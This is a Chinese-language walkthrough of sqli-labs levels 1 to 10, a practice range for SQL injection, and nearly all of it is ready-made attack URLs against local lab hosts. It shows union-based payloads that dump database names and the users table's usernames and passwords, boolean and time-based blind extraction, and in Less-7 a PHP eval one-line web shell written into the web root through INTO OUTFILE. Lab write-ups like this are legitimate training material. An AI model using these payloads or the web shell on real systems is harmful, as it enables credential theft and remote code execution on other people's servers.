sqli-labs靶场1-10
参考crow: https://github.com/crow821/crowsec
MySQL连接的当前用户名和主机名:
1 | SELECT SYSTEM_USER(); |
MySQL连接的当前用户名和主机名:
1 | SELECT USER(); |
MySQL帐户的用户名和主机名:
1 | current_user() |
MySQL查看当前数据库
1 | select database(); |
MySQL查看当前数据版本
1 | select version(); |
MySQL查看安装路径
1 | @@datadir |
当前操作系统
1 | @@version_compile_os |
属于同一组,将属于同一组的列显示出来
1 | group_concat() |
A~B
1 | concat_ws('~',A,B) |
常用命令
查库:
1 | select schema_name from information_schema.schemata; |
查表:
1 | select table_name from information_schema.tables where table_schema='security'; |
查列:
1 | select column_name from information_schema.columns where table_name='users'; |
查字段:
1 | select username,password from security.users; |
Less-1 - Less-4
注入
查看是否有注入
1
http://192.168.169.130:86/Less-1/?id=1'
1
2
3
4
5Less-1 - Less-4 的不同点
1. ?id=1'
2. ?id=1
3. ?id=1')
4. ?id=1"查看有多少列
1
http://192.168.169.130:86/Less-1/?id=1' order by 3--+
查看哪些数据可以回显
1
http://192.168.169.130:86/Less-1/?id=-1' UNION SELECT 1,2,3--+
查看当前数据库
1
http://192.168.169.130:86/Less-1/?id=-1' UNION SELECT 1,2,database()--+
查看数据库security
1
2
3http://192.168.169.130:86/sqli/Less-1/?id=-1' union select 1,2,schema_name from information_schema.schemata limit 4,1--+
或 查看所有的数据库
http://192.168.169.130:86/sqli/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata--+查表
1
2
3http://192.168.169.130:86/sqli/Less-1/?id=-1' union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1--+
或 查看所有的:
http://192.168.169.130:86/sqli/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+查询列信息
1
2
3http://192.168.169.130:86/sqli/Less-1/?id=-1' union select 1,2,column_name from information_schema.columns where table_name=0x7573657273--+
或 是查看所以的列信息
http://192.168.169.130:86/sqli/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+查询一个账号和密码
1
2
3http://192.168.169.130:86/sqli/Less-1/?id=-1' union select 1,2,concat_ws('~',username,password) from security.users limit 1,1--+
或 直接可以得到所有的账号和密码,并且使用~符号进行分割。
http://192.168.169.130:86/sqli/Less-1/?id=-1' union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users --+Less-5 bool盲注
基础知识
left()函数: left(database(),1)=’s’
left(a,b)从左侧截取a的前b位,正确则返回1,错误则返回0
regexp函数:select user() regexp ‘r’
user()的结果是root,regexp为匹配root的正则表达式
like函数: select user() like ‘ro%
匹配与regexp相似。
substr(a,b,c) elect substr() XXXX
substr(a,b,c)从位置b开始,截取a字符串c位长度
ascii()
将某个字符串转化为ascii值
chr(数字) 或者是ord(‘字母’)
使用python中的两个函数可以判断当前的ascii值是多少
- 没有错误提示 也没有回显 但是输入错误的话页面会有反应 也就是说 只有 true 和false
查看是否有注入
1
http://127.0.0.1/sqli/Less-5/?id=1'
查看有多少列
1
http://127.0.0.1/sqli/Less-5/?id=1' order by 3--+
判断第一位是否是s,然后使用bp进行爆破处理:
1
http://127.0.0.1/sqli/Less-5/?id=1' and left((select database()),1)='s'--+
通过返回的长度来确定第二位是多少,最后确定为e,依次类推进行测试。
或者是使用if来进行判断测试:
此时是没有返回的(这种方法是错误的)1
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select database()),1,1))>156--+
此时返回 you are in…….代表执行成功。
1
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select database()),1,1))>110--+
Less-6 bool盲注(流程同 Less-5)
完整注入流程:
通过二分法猜解得到所有的库,红色为可变参数。
1
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+
再次通过二分法可猜解得到security下的所有表。其中,红色为可变参数。
1
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))>1--+
通过二分法可猜解users内的字段,其中红色为可变参数。
1
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1)) >1 --+
继续猜解即可得到字段内的值。
1
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select username from security.users limit 1,1),1,1))>1--+
Less-7
基础知识
- 一句话木马:php版本:
1
<?php @eval($_POST["a"]);?>
- load_file() 读取本地文件
1
select load_file('C:\\inetpub\\target\\sqlilabs\\test.txt');
- into outfile 写文件 文件位置: C:\inetpub\target\sqlilabs
1
select 'testtest' into outfile 'test.txt';
1
select 'testtest' into outfile 'C:\\inetpub\\target\\sqlilabs\\test.txt';
- 注意事项:
\\
完整注入流程:
- 报错
1
http://127.0.0.1/sqli/Less-7/?id=1'))--+
- 查看有多少列
1
http://127.0.0.1/sqli/Less-7/?id=1')) order by 3--+
- 将一句话木马写入其中
1
http://127.0.0.1/sqli/Less-7/?id=-1')) union select 1,2,'<?php @eval($_POST["a"]);?>' into outfile 'C:\\phpstudy\\PHPTutorial\\WWW\\sqli\\Less-7\\test.php' --+
- 使用中国菜刀访问即可!
Less-8
Less-8 bool盲注
判断此时存在注入漏洞
1
http://127.0.0.1/sqli/Less-8/?id=1’
当3改为4的时候,you are in….消失,说明存在三列。
1
http://127.0.0.1/sqli/Less-8/?id=1' order by 3--+
猜出来当前第一位是s
1
http://127.0.0.1/sqli/Less-8/?id=1' and left((select database()),1)=0x73 --+
或者是使用:
1
http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr((select database()),1,1)) > 16--+ 此时是有回显的。
先通过大于号或者小于号来判断数据库的第一个字母是哪一个
1
http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >17 --+
也可以使用
1
http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1)) = 115--+
此时可以验证数据库中第五个数据库的第一个字母是s
判断security数据库中的第4个表中的数据的第一位是否大于11
1
http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1),1,1)) >11 --+
也可以使用
1
http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1),1,1)) =117 --+
验证数据库中第4个表中的数据的第一位的第一个字母的ascii码是否是117,也就是 u
同理,进行判断表中的字段,然后进行判断。可以得到username,password;
1
http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 0x7573657273 limit 1,1),1,1)) >10 --+
同理,进行判断,最后再使用password进行判断。
1
http://127.0.0.1/sqli/Less-8/?id=1' and ascii(substr((select username from security.users limit 0,1),1,1)) >10 --+
因为猜解速度较慢,可以配合burpsuite或者是sqlmap的脚本来使用。
Less-8 时间盲注
- IF(condition,A,B)如果条件condition为true,则执行语句A,否则执行B
- 使用延迟的方法判断是否存在注入漏洞。当然判断是否存在注入漏洞的方法很多。
1
http://127.0.0.1/sqli/Less-8/?id=1' and sleep(5)--+
- 当为8的时候很快加载,而为其他值得时候加载较慢(5s左右),那就说明此时数据库的长度就是8(security)
1
http://127.0.0.1/sqli/Less-8/?id=1' and if(length(database()) = 8,1,sleep(5))--+
- 如果当前数据库的第一个字母的ascii值大于113的时候,会立刻返回结果,否则执行5s。
1
http://127.0.0.1/sqli/Less-8/?id=1' and if(ascii(substr((select database()),1,1)) >113,1,sleep(5))--+
- 同理判断数据库中的第5个数据库的第一位的ascii的值是不是大于112(实际中是115),如果是的则速度返回,否则延时5s返回结果。
1
http://127.0.0.1/sqli/Less-8/?id=1' and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1))>112,1,sleep(5))--+
- 其余步骤与法一基本类似,可以采用burpsuite或者是sql盲注脚本使用。
Less-9
- 当使用order by的时候,此时无论如何都是回显you are in….所以无法使用order by进行判断。
1
http://127.0.0.1/sqli/Less-9/?id=1' order by 3999--+
- 当存在注入漏洞时,可以使用延迟注入进行判断,此时若存在漏洞,则睡眠5s之后再返回结果。
1
http://127.0.0.1/sqli/Less-9/?id=1' and sleep(5)--+
- 通过返回时间进行判断,此时如果数据库长度为8,则可以较快返回。
1
http://127.0.0.1/sqli/Less-9/?id=1' and if(length(database())=8,1,sleep(5));
- 使用less-8中同样的方法进行判断即可!
1
http://127.0.0.1/sqli/Less-9/?id=1' and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1))>1112,1,sleep(5))--+
- 因为盲注属于猜解,推荐使用脚本进行操作。
Less-10
1.只是将less-9中的单引号换成了双引号,其余的均相同。1
http://127.0.0.1/sqli/Less-10/?id=1" and sleep(11)--+